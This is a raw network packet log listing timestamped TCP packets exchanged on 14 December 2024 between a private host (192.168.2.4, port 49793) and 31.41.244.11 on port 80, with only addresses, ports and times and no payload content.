Dec 14, 2024 23:58:20.453958988 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.454013109 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.454061031 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.454204082 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.455045938 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.455101967 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.455173016 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.455219030 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.464365959 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.464432001 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.464510918 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.464546919 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.464570045 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.464590073 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.464972973 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.465007067 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.465035915 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.465039968 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.465056896 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.465089083 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.465740919 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.465775013 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.465792894 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.465810061 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.465816975 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.465858936 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.466501951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.466537952 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.466561079 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.466573954 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.466581106 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.466610909 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.466620922 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.466670036 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.467250109 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.467284918 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.467330933 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.467330933 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.467335939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.467380047 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.468029022 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.468064070 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.468087912 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.468106031 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.468113899 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.468163967 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.468672037 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.468725920 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.469132900 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.469185114 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.469265938 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.469300985 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.469321966 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.469350100 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.469713926 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.469772100 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.469979048 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.470012903 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.470067024 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.470423937 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.470474958 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.470608950 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.470849991 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.471529007 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.471673965 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.471728086 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.472618103 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.472683907 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.472754002 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.473064899 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.473728895 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.473783016 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.473850965 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.473916054 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.474816084 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.474906921 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.474944115 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.474997997 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.475944996 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.476020098 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.476067066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.476120949 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.477026939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.477103949 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.477161884 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.477225065 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.478112936 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.478168011 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.478234053 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.478286028 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.479214907 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.479266882 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.479350090 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.479420900 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.480304003 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.480397940 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.480448008 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.480501890 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.481406927 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.481508017 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.481530905 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.481791019 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.482599020 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.482652903 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.482703924 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.482755899 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.483596087 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.483648062 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.483721972 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.483776093 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.484689951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.484760046 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.484843016 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.484895945 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.485826969 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.485882044 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.485964060 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.486020088 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.486876011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.486936092 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.487003088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.487051964 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.488002062 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.488061905 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.488121986 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.488190889 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.489083052 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.489156008 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.489196062 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.489243031 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.490267992 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.490323067 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.490329981 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.490369081 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.491280079 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.491345882 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.491424084 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.491473913 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.492387056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.492458105 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.492522955 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.492621899 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.493477106 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.493546009 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.493588924 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.493643045 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.494595051 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.494652033 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.494700909 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.494749069 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.495676994 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.495748043 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.495807886 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.496124029 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.496762037 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.496819973 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.496896982 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.496993065 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.497853041 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.497920990 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.497987986 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.498037100 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.498977900 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.499032021 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.499099016 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.499147892 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.500049114 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.500102997 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.500180006 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.500235081 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.501154900 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.501223087 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.501285076 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.501348019 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.502289057 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.502347946 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.502414942 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.502465963 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.503370047 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.503482103 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.503489971 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.503608942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.504442930 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.504503012 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.504573107 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.504642010 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.505532026 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.505589962 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.505651951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.505951881 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.506632090 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.506793022 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.506845951 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.507807016 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.507869005 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.507944107 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.508150101 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.508853912 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.508987904 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.508999109 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.509402037 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.509915113 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.509968042 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.644834995 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.644896984 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.645006895 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.645071983 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.645248890 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.645304918 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.646176100 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.646301031 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.646351099 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.647000074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.647052050 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.647090912 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.648129940 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.648200989 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.648276091 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.649183035 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.649250031 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.649291039 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.649337053 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.650346041 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.650552988 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.650610924 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.651371956 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.651516914 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.651573896 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.652473927 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.652528048 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.652575970 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.653422117 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.653579950 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.653815985 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.653873920 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.654709101 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.654829979 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.654886961 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.655806065 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.655864954 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.655916929 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.656861067 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.656914949 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.656960964 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.657421112 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.657953024 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.658086061 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.658133030 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.659043074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.659153938 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.659209967 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.660136938 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.660192013 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.660248995 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.661245108 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.661308050 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.661403894 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.662329912 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.662389040 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.662437916 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.663444996 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.663512945 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.663549900 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.663594007 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.664520979 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.664650917 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.664707899 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.665801048 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.665910959 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.665967941 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.666728020 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.666785002 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.666834116 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.667818069 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.667867899 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.667928934 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.668972969 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.669022083 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.669023991 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.669059038 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.669997931 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.670144081 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.670192957 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.671097040 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.671230078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.671277046 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.672204971 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.672333956 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.672389984 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.673309088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.673369884 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.673418999 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.674412966 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.674478054 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.674498081 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.675508976 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.675569057 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.675662994 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.675709009 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.676656961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.676764011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.676831961 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.677705050 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.677841902 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.677906036 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.678817034 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.678868055 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.678987980 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.679908037 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.679960966 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.680062056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.681025982 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.681081057 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.681148052 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.681195974 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.682084084 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.682223082 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.682274103 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.683182955 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.683342934 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.683403015 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.684302092 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.684349060 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.684395075 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.685383081 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.685429096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.685429096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.685482979 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.685529947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.686475992 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.686584949 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.686633110 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.687565088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.687695980 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.687755108 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.688676119 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.688720942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.688779116 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.689403057 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.689764977 CET	80	49793	31.41.244.11	192.168.2.4
